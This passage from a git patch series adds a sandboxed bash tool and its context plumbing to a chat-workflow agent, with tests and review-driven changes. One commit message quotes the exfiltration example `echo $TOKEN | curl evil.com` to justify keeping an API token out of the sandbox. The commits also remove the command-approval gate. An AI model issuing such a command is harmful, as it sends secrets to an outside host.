`experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host- side gating belongs at the route/UI layer if it ever returns. - Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/lib/workflows/runAgentStep.ts | 34 ++-- app/lib/workflows/runAgentWorkflow.ts | 32 ++-- lib/agent/__tests__/buildAgentTools.test.ts | 17 ++ lib/agent/buildAgentTools.ts | 20 +++ lib/agent/tools/AgentContext.ts | 34 ++++ lib/agent/tools/__tests__/bashTool.test.ts | 158 ++++++++++++++++++ .../__tests__/buildRecoupExecEnv.test.ts | 31 ++++ lib/agent/tools/__tests__/getSandbox.test.ts | 39 +++++ .../tools/__tests__/isAgentContext.test.ts | 42 +++++ lib/agent/tools/bashTool.ts | 116 +++++++++++++ lib/agent/tools/buildRecoupExecEnv.ts | 30 ++++ lib/agent/tools/getSandbox.ts | 28 ++++ lib/agent/tools/isAgentContext.ts | 26 +++ lib/agents/generalAgent/getGeneralAgent.ts | 5 +- lib/chat/const.ts | 13 ++ lib/chat/handleChatWorkflowStream.ts | 20 +++ 16 files changed, 615 insertions(+), 30 deletions(-) create mode 100644 lib/agent/__tests__/buildAgentTools.test.ts create mode 100644 lib/agent/buildAgentTools.ts create mode 100644 lib/agent/tools/AgentContext.ts create mode 100644 lib/agent/tools/__tests__/bashTool.test.ts create mode 100644 lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts create mode 100644 lib/agent/tools/__tests__/getSandbox.test.ts create mode 100644 lib/agent/tools/__tests__/isAgentContext.test.ts create mode 100644 lib/agent/tools/bashTool.ts create mode 100644 lib/agent/tools/buildRecoupExecEnv.ts create mode 100644 lib/agent/tools/getSandbox.ts create mode 100644 lib/agent/tools/isAgentContext.ts diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index 352dcd265..f9a894195 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -1,27 +1,36 @@ import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai"; import { gateway } from "@ai-sdk/gateway"; import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; +import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; +import { buildAgentTools } from "@/lib/agent/buildAgentTools"; +import type { AgentContext } from "@/lib/agent/tools/AgentContext"; export type RunAgentStepInput = { messages: UIMessage[]; modelId: string; writable: WritableStream; + /** + * Threaded into `streamText`'s `experimental_context` so each tool's + * `execute` callback can read the sandbox state + per-prompt context. + */ + agentContext: AgentContext; }; /** - * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow - * `"use step"` so that: + * One LLM turn (with internal tool-call iteration) in the chat workflow. + * Runs as a Vercel Workflow `"use step"` so: * * - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside. * - The result is cached as a single durable event — replays after a crash - * do not re-bill the model. + * do not re-bill the model or re-execute tools. * - * Currently emits a plain text response with no tools. Sandbox tools land in - * the follow-up PR (port `@open-harness/agent` tools + wire via - * `experimental_context`). + * `streamText` drives the tool-call → tool-result → next-LLM-call loop + * internally using its default stop condition. Our outer workflow stays + * single-turn for now — multi-turn message threading lands when the rest + * of the tool surface ports in a follow-up PR. * - * @param input - Messages + selected model + the workflow's writable stream. - * @returns finishReason from the model run (for the workflow loop's break condition). + * @param input - Messages + selected model + writable stream + agent context. + * @returns finishReason from the model run. */ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> { "use step"; @@ -29,17 +38,22 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe console.log("[runAgentStep] start", { modelId: input.modelId, messageCount: input.messages.length, + hasSandboxState: Boolean(input.agentContext.sandbox?.state), }); const modelMessages = convertToModelMessages(input.messages); + const tools = buildAgentTools(); const result = streamText({ model: gateway(input.modelId), system: agentCustomInstructions, messages: modelMessages, + tools, + stopWhen: CHAT_AGENT_STOP_WHEN, + experimental_context: input.agentContext, }); - // Acquire the writer once and release in `finally` — re-acquiring per chunk - // (the previous shape) leaked the lock when any write threw. + // Acquire the writer once and release in `finally` so a thrown chunk + // doesn't leak the lock. const writer = input.writable.getWriter(); try { for await (const part of result.toUIMessageStream()) { diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts index db679145a..ce65b0bb3 100644 --- a/app/lib/workflows/runAgentWorkflow.ts +++ b/app/lib/workflows/runAgentWorkflow.ts @@ -1,12 +1,18 @@ import { getWritable } from "workflow"; import type { UIMessage, UIMessageChunk } from "ai"; import { runAgentStep } from "@/app/lib/workflows/runAgentStep"; +import type { AgentContext } from "@/lib/agent/tools/AgentContext"; export type RunAgentWorkflowInput = { messages: UIMessage[]; chatId: string; sessionId: string; modelId: string; + /** + * Threaded into `streamText`'s `experimental_context` so tools (bash et al.) + * can read sandbox state + per-prompt Recoup creds. + */ + agentContext: AgentContext; }; /** @@ -15,18 +21,14 @@ export type RunAgentWorkflowInput = { * client; this function writes UIMessage chunks into the workflow's writable * via `runAgentStep`. * - * Currently runs a SINGLE `runAgentStep` turn. A multi-turn agent loop is - * unsafe today: each iteration would re-send the original prompt without - * the assistant's tool-call response in scope, so a `tool-calls` finish - * reason would loop forever on the same input. The proper multi-turn - * shape (where the step appends its response to `messages` before the - * next iteration) lands with the sandbox-tool port in PR 4. - * - * Until then, if the model returns `tool-calls` we log a warning and exit - * — the client receives the partial tool-call chunks but no follow-up turn. + * Currently runs a SINGLE `runAgentStep` turn. Tool-call iteration (up to + * MAX_TOOL_STEPS) happens INSIDE `streamText` via `stopWhen` — so the + * single workflow turn covers the full "user → assistant → tool → tool + * result → assistant" cycle without our outer loop having to thread + * messages between iterations. * * WDK constraints honored: - * - All I/O (streamText, fetches) lives in `"use step"` functions. + * - All I/O (streamText, sandbox.exec, fetches) lives in `"use step"` functions. * - The workflow body only orchestrates — no fetch / setTimeout / fs / crypto. */ export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise { @@ -43,14 +45,8 @@ export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise { + it("returns a tools record keyed by tool name", () => { + const tools = buildAgentTools(); + expect(tools).toHaveProperty("bash"); + expect(typeof tools.bash).toBe("object"); + }); + + it("each tool has an inputSchema, description, and execute", () => { + const tools = buildAgentTools(); + expect(tools.bash.inputSchema).toBeDefined(); + expect(tools.bash.description).toBeDefined(); + expect(typeof tools.bash.execute).toBe("function"); + }); +}); diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts new file mode 100644 index 000000000..be6bde085 --- /dev/null +++ b/lib/agent/buildAgentTools.ts @@ -0,0 +1,20 @@ +import { bashTool } from "@/lib/agent/tools/bashTool"; + +/** + * Factory for the full agent tool set passed into `streamText({ tools })`. + * Each tool reads its sandbox handle + recoup creds from `experimental_context` + * at execute time — the factory takes no arguments because the tools are + * stateless modulo that context. + * + * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`, + * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`, + * `fetch`) port in follow-up PRs and slot into this record one-by-one + * without changing the factory signature. + */ +export function buildAgentTools() { + return { + bash: bashTool(), + }; +} + +export type AgentTools = ReturnType; diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts new file mode 100644 index 000000000..63d2a1b7e --- /dev/null +++ b/lib/agent/tools/AgentContext.ts @@ -0,0 +1,34 @@ +import type { VercelState } from "@/lib/sandbox/vercel/state"; + +/** + * Per-tool-call context threaded into the agent via `streamText`'s + * `experimental_context`. Mirrors the open-agents `AgentContext` shape + * (subset — slim PR 4 ports only the `bash` tool, so context only needs + * what `bash` reads). + * + * Why no `recoupAccessToken` field? A short-lived per-prompt credential + * would let sandbox tools (`skill`, the eventual `recoup-api` skill) call + * back to recoup-api as the caller. We deliberately omit it here — the + * legacy api-key path is too long-lived to expose inside a sandbox where + * model-issued bash commands can read env. Proper short-lived token + * minting lands alongside the `skill` tool port. + */ +export type AgentContext = { + /** + * Persistable sandbox state. Tools reconnect via `connectVercel(state)` — + * we never pass a live `Sandbox` instance through context because + * workflow durability requires replay-friendly inputs. + */ + sandbox: { + state: VercelState; + workingDirectory: string; + currentBranch?: string; + }; + /** + * Organization UUID when the sandbox was opened against a recoupable + * org repo (`org--`). Forwarded to sandboxed commands as + * `RECOUP_ORG_ID` so future `recoup-api` skill calls scope to that org. + * Public information — no security risk in exposing. + */ + recoupOrgId?: string; +}; diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts new file mode 100644 index 000000000..da9a999d3 --- /dev/null +++ b/lib/agent/tools/__tests__/bashTool.test.ts @@ -0,0 +1,158 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { bashTool } from "@/lib/agent/tools/bashTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const baseContext = { + sandbox: { state: { sandboxName: "session-x" }, workingDirectory: "/sandbox/mono" }, +}; + +function makeSandbox(overrides: Record = {}) { + return { + workingDirectory: "/sandbox/mono", + exec: vi.fn(), + execDetached: vi.fn(), + ...overrides, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("bashTool.execute", () => { + it("executes a command via sandbox.exec in the sandbox's working directory", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "README.md\npackage.json", + stderr: "", + truncated: false, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = await tool.execute!({ command: "ls" }, { + experimental_context: baseContext, + } as never); + expect(result).toEqual({ + success: true, + exitCode: 0, + stdout: "README.md\npackage.json", + stderr: "", + }); + expect(sandbox.exec).toHaveBeenCalledWith( + "ls", + "/sandbox/mono", + expect.any(Number), + expect.any(Object), + ); + }); + + it("includes `truncated: true` in the result when sandbox.exec truncated output", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "lots of output", + stderr: "", + truncated: true, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = (await tool.execute!({ command: "find ." }, { + experimental_context: baseContext, + } as never)) as { truncated?: boolean }; + expect(result.truncated).toBe(true); + }); + + it("resolves a workspace-relative cwd against sandbox.workingDirectory", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + await tool.execute!({ command: "ls", cwd: "apps/web" }, { + experimental_context: baseContext, + } as never); + expect(sandbox.exec).toHaveBeenCalledWith( + "ls", + "/sandbox/mono/apps/web", + expect.any(Number), + expect.any(Object), + ); + }); + + it("injects RECOUP_ORG_ID into the exec env when present in context", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + await tool.execute!({ command: "curl example.com" }, { + experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, + } as never); + const opts = sandbox.exec.mock.calls[0]?.[3] as { env?: Record }; + expect(opts.env).toEqual({ RECOUP_ORG_ID: "org-uuid" }); + }); + + it("returns the detached commandId when called with detached:true", async () => { + const sandbox = makeSandbox({ + execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-123" }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = (await tool.execute!({ command: "npm run dev", detached: true }, { + experimental_context: baseContext, + } as never)) as { success: boolean; stdout: string }; + expect(result.success).toBe(true); + expect(result.stdout).toMatch(/cmd-123/); + expect(sandbox.execDetached).toHaveBeenCalledWith("npm run dev", "/sandbox/mono"); + }); + + it("returns success:false with a descriptive stderr when the sandbox lacks execDetached", async () => { + const sandbox = makeSandbox({ execDetached: undefined }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = (await tool.execute!({ command: "npm run dev", detached: true }, { + experimental_context: baseContext, + } as never)) as { success: boolean; stderr: string }; + expect(result.success).toBe(false); + expect(result.stderr).toMatch(/detached mode is not supported/i); + }); + + it("does NOT inject env vars on detached execs", async () => { + const sandbox = makeSandbox({ + execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-1" }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + await tool.execute!({ command: "npm run dev", detached: true }, { + experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, + } as never); + // execDetached signature is (command, cwd) — no env arg. + expect(sandbox.execDetached.mock.calls[0]).toHaveLength(2); + }); +}); diff --git a/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts new file mode 100644 index 000000000..3422fd662 --- /dev/null +++ b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts @@ -0,0 +1,31 @@ +import { describe, it, expect } from "vitest"; +import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv"; + +const baseSandbox = { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }; + +describe("buildRecoupExecEnv", () => { + it("returns undefined when no context", () => { + expect(buildRecoupExecEnv(undefined)).toBeUndefined(); + expect(buildRecoupExecEnv(null)).toBeUndefined(); + expect(buildRecoupExecEnv("not-a-context")).toBeUndefined(); + }); + + it("returns undefined when context has no recoupOrgId", () => { + expect(buildRecoupExecEnv({ sandbox: baseSandbox })).toBeUndefined(); + }); + + it("injects RECOUP_ORG_ID when present in context", () => { + const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "org-uuid" }); + expect(env).toEqual({ RECOUP_ORG_ID: "org-uuid" }); + }); + + it("ignores empty-string recoupOrgId", () => { + const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "" }); + expect(env).toBeUndefined(); + }); + + it("returns undefined when the input is not a valid AgentContext shape", () => { + expect(buildRecoupExecEnv({ recoupOrgId: "org-uuid" })).toBeUndefined(); + expect(buildRecoupExecEnv({ sandbox: null, recoupOrgId: "org-uuid" })).toBeUndefined(); + }); +}); diff --git a/lib/agent/tools/__tests__/getSandbox.test.ts b/lib/agent/tools/__tests__/getSandbox.test.ts new file mode 100644 index 000000000..a14122f81 --- /dev/null +++ b/lib/agent/tools/__tests__/getSandbox.test.ts @@ -0,0 +1,39 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +beforeEach(() => vi.clearAllMocks()); + +describe("getSandbox", () => { + it("reconnects via connectVercel(state) and returns the sandbox", async () => { + const fakeSandbox = { workingDirectory: "/sandbox/mono" }; + vi.mocked(connectVercel).mockResolvedValue(fakeSandbox as never); + const state = { sandboxName: "session-xyz" }; + const result = await getSandbox( + { sandbox: { state, workingDirectory: "/sandbox/mono" } }, + "bash", + ); + expect(result).toBe(fakeSandbox); + expect(connectVercel).toHaveBeenCalledWith(state); + }); + + it("throws a descriptive error when context is missing entirely", async () => { + await expect(getSandbox(undefined, "bash")).rejects.toThrow(/Sandbox state missing/); + }); + + it("throws when sandbox.state is missing", async () => { + await expect( + getSandbox({ sandbox: { workingDirectory: "/x" } } as never, "bash"), + ).rejects.toThrow(/Sandbox state missing/); + }); + + it("throws when sandbox.workingDirectory is empty (tightened guard)", async () => { + await expect( + getSandbox({ sandbox: { state: {}, workingDirectory: "" } } as never, "bash"), + ).rejects.toThrow(/Sandbox state missing/); + }); +}); diff --git a/lib/agent/tools/__tests__/isAgentContext.test.ts b/lib/agent/tools/__tests__/isAgentContext.test.ts new file mode 100644 index 000000000..29ad4f29d --- /dev/null +++ b/lib/agent/tools/__tests__/isAgentContext.test.ts @@ -0,0 +1,42 @@ +import { describe, it, expect } from "vitest"; +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +describe("isAgentContext", () => { + it("returns true for a well-formed context", () => { + expect( + isAgentContext({ + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, + }), + ).toBe(true); + }); + + it("returns false for non-object inputs", () => { + expect(isAgentContext(undefined)).toBe(false); + expect(isAgentContext(null)).toBe(false); + expect(isAgentContext("nope")).toBe(false); + expect(isAgentContext(42)).toBe(false); + }); + + it("returns false when sandbox is missing", () => { + expect(isAgentContext({})).toBe(false); + }); + + it("returns false when sandbox is null", () => { + expect(isAgentContext({ sandbox: null })).toBe(false); + }); + + it("returns false when sandbox is empty (missing state and workingDirectory)", () => { + expect(isAgentContext({ sandbox: {} })).toBe(false); + }); + + it("returns false when sandbox.state is missing or null", () => { + expect(isAgentContext({ sandbox: { workingDirectory: "/x" } })).toBe(false); + expect(isAgentContext({ sandbox: { state: null, workingDirectory: "/x" } })).toBe(false); + }); + + it("returns false when sandbox.workingDirectory is missing, non-string, or empty", () => { + expect(isAgentContext({ sandbox: { state: {} } })).toBe(false); + expect(isAgentContext({ sandbox: { state: {}, workingDirectory: 42 } })).toBe(false); + expect(isAgentContext({ sandbox: { state: {}, workingDirectory: "" } })).toBe(false); + }); +}); diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts new file mode 100644 index 000000000..908113812 --- /dev/null +++ b/lib/agent/tools/bashTool.ts @@ -0,0 +1,116 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; + +const TIMEOUT_MS = 120_000; + +const bashInputSchema = z.object({ + command: z.string().describe("The bash command to execute"), + cwd: z + .string() + .optional() + .describe("Workspace-relative working directory for the command (e.g., apps/web)"), + detached: z + .boolean() + .optional() + .describe( + "Use this whenever you want to run a persistent server in the background (e.g., npm run dev, next dev). The command starts and returns immediately without waiting for it to finish.", + ), +}); + +/** + * Factory for the `bash` sandbox tool. Runs `bash -c ""` inside + * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's + * working directory. + * + * Approval gating is intentionally absent — model-issued commands are + * trusted in this PR. Add a host-side gate at the route/UI layer if that + * changes. + * + * Foreground execs receive `RECOUP_ORG_ID` from agent context (when the + * sandbox is org-scoped) so future `recoup-api` skill calls can scope to + * the right org. Detached execs deliberately skip env injection — those + * processes outlive the prompt. + */ +export const bashTool = () => + tool({ + description: `Execute a bash command in the user's shell (non-interactive). + +WHEN TO USE: +- Running existing project commands (build, test, lint, typecheck) +- Using read-only CLI tools (git status, git diff, ls, etc.) +- Invoking language/package managers (npm, pnpm, yarn, pip, go, etc.) as part of the task + +WHEN NOT TO USE: +- Reading files (use the file read tool instead, once available) +- Editing or creating files (use file edit/write tools, once available) +- Searching code or text (use grep / glob tools, once available) +- Interactive commands (shells, editors, REPLs) + +USAGE: +- Runs bash -c "" in a non-interactive shell (no TTY/PTY) +- Commands run in the sandbox working directory by default — do NOT prepend "cd /path &&" +- Use the cwd parameter ONLY with a workspace-relative subdirectory +- Commands automatically timeout after ~2 minutes +- Combined stdout/stderr output is truncated after ~50,000 characters + +IMPORTANT: +- Never chain commands with ';' or '&&' — use separate tool calls +- Never use interactive commands (vim, nano, top, bash, ssh, etc.) +- Always quote file paths that may contain spaces +- Use detached: true to start dev servers / long-running processes in the background`, + inputSchema: bashInputSchema, + execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => { + const sandbox = await getSandbox(experimental_context, "bash"); + const workingDirectory = sandbox.workingDirectory; + const workingDir = cwd + ? path.isAbsolute(cwd) + ? cwd + : path.resolve(workingDirectory, cwd) + : workingDirectory; + + if (detached) { + if (!sandbox.execDetached) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: + "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.", + }; + } + try { + const { commandId } = await sandbox.execDetached(command, workingDir); + return { + success: true, + exitCode: null, + stdout: `Process started in background (command ID: ${commandId}). The server is now running.`, + stderr: "", + }; + } catch (error) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: error instanceof Error ? error.message : String(error), + }; + } + } + + const recoupEnv = buildRecoupExecEnv(experimental_context); + const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, { + signal: abortSignal, + ...(recoupEnv ? { env: recoupEnv } : {}), + }); + + return { + success: result.success, + exitCode: result.exitCode, + stdout: result.stdout, + stderr: result.stderr, + ...(result.truncated && { truncated: true }), + }; + }, + }); diff --git a/lib/agent/tools/buildRecoupExecEnv.ts b/lib/agent/tools/buildRecoupExecEnv.ts new file mode 100644 index 000000000..6eaf3015f --- /dev/null +++ b/lib/agent/tools/buildRecoupExecEnv.ts @@ -0,0 +1,30 @@ +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +/** + * Build a per-invocation env override carrying Recoupable sandbox context + * so outbound shell commands (curl, scripts, the `recoup-api` skill) can + * scope requests correctly without any state persisting on the sandbox. + * + * Currently injects only `RECOUP_ORG_ID` — a public identifier. Auth-token + * injection is deliberately NOT included here; a long-lived api key in the + * sandbox env would be readable by any model-issued bash command. Proper + * short-lived token minting will land alongside the `skill` tool port + * (when there's an actual consumer for it). + * + * Returns `undefined` when nothing is available to inject so callers can + * cleanly spread a conditional `...(env ? { env } : {})` into exec opts. + * + * @param experimental_context - The opaque context object passed by AI SDK to tool execute. + */ +export function buildRecoupExecEnv( + experimental_context: unknown, +): Record | undefined { + if (!isAgentContext(experimental_context)) return undefined; + + const env: Record = {}; + if (experimental_context.recoupOrgId) { + env.RECOUP_ORG_ID = experimental_context.recoupOrgId; + } + + return Object.keys(env).length > 0 ? env : undefined; +} diff --git a/lib/agent/tools/getSandbox.ts b/lib/agent/tools/getSandbox.ts new file mode 100644 index 000000000..be6c46605 --- /dev/null +++ b/lib/agent/tools/getSandbox.ts @@ -0,0 +1,28 @@ +import type { Sandbox } from "@/lib/sandbox/interface"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +/** + * Resolve a connected `Sandbox` instance from `experimental_context`. + * Reconnects each call via `connectVercel(state)` rather than caching the + * handle on context — workflow durability requires that side-effecting + * resources (sandbox sessions) be re-acquired inside the step that uses + * them, not passed across event boundaries. + * + * @param experimental_context - The opaque context object passed by AI SDK to tool execute. + * @param toolName - Optional tool name to surface in error messages. + */ +export async function getSandbox( + experimental_context: unknown, + toolName?: string, +): Promise { + if (!isAgentContext(experimental_context)) { + const where = toolName ? ` (tool: ${toolName})` : ""; + throw new Error( + `Sandbox state missing from agent context${where}. ` + + "Ensure the workflow start payload includes `sandbox.state` and that " + + "runAgentStep threads it via experimental_context.", + ); + } + return connectVercel(experimental_context.sandbox.state); +} diff --git a/lib/agent/tools/isAgentContext.ts b/lib/agent/tools/isAgentContext.ts new file mode 100644 index 000000000..0049ac010 --- /dev/null +++ b/lib/agent/tools/isAgentContext.ts @@ -0,0 +1,26 @@ +import type { AgentContext } from "@/lib/agent/tools/AgentContext"; + +/** + * Type-guard that confirms an arbitrary `experimental_context` shape has + * the AgentContext fields tools rely on at runtime. Validates each required + * leaf (sandbox object, state object, non-empty workingDirectory) so callers + * can trust the narrowed type — earlier weaker guards returned true for + * `{ sandbox: null }` or `{ sandbox: {} }`, letting tools later crash on + * "cannot read .x of undefined". + * + * @param value - The opaque context object passed by AI SDK to tool execute. + */ +export function isAgentContext(value: unknown): value is AgentContext { + if (typeof value !== "object" || value === null) return false; + + const candidate = value as { sandbox?: unknown }; + const sandbox = candidate.sandbox; + if (typeof sandbox !== "object" || sandbox === null) return false; + + const sandboxFields = sandbox as { state?: unknown; workingDirectory?: unknown }; + if (typeof sandboxFields.state !== "object" || sandboxFields.state === null) return false; + if (typeof sandboxFields.workingDirectory !== "string") return false; + if (sandboxFields.workingDirectory.length === 0) return false; + + return true; +} diff --git a/lib/agents/generalAgent/getGeneralAgent.ts b/lib/agents/generalAgent/getGeneralAgent.ts index 7c2c9407b..e4bc4fc56 100644 --- a/lib/agents/generalAgent/getGeneralAgent.ts +++ b/lib/agents/generalAgent/getGeneralAgent.ts @@ -1,4 +1,5 @@ -import { stepCountIs, ToolLoopAgent } from "ai"; +import { ToolLoopAgent } from "ai"; +import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; import { AnthropicProviderOptions } from "@ai-sdk/anthropic"; import { GoogleGenerativeAIProviderOptions } from "@ai-sdk/google"; import { OpenAIResponsesProviderOptions } from "@ai-sdk/openai"; @@ -52,7 +53,7 @@ export default async function getGeneralAgent(body: ChatRequestBody): Promise Date: Thu, 21 May 2026 13:49:12 -0500 Subject: [PATCH 4/5] =?UTF-8?q?feat(chat-workflow):=20port=207=20leaf=20sa?= =?UTF-8?q?ndbox=20tools=20=E2=80=94=20read/write/edit/grep=E2=80=A6=20(#5?= =?UTF-8?q?85)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. New tool files (one tool per file, per sweetman SRP): - readFileTool.ts — read with 1-indexed offset/limit, numbered output - writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile - editFileTool.ts — exact-string replace, ambiguous-match rejection - grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200 - globTool.ts — find -printf with mtime sort, GNU/BSD-compatible - todoWriteTool.ts — stateless planning surface; echoes 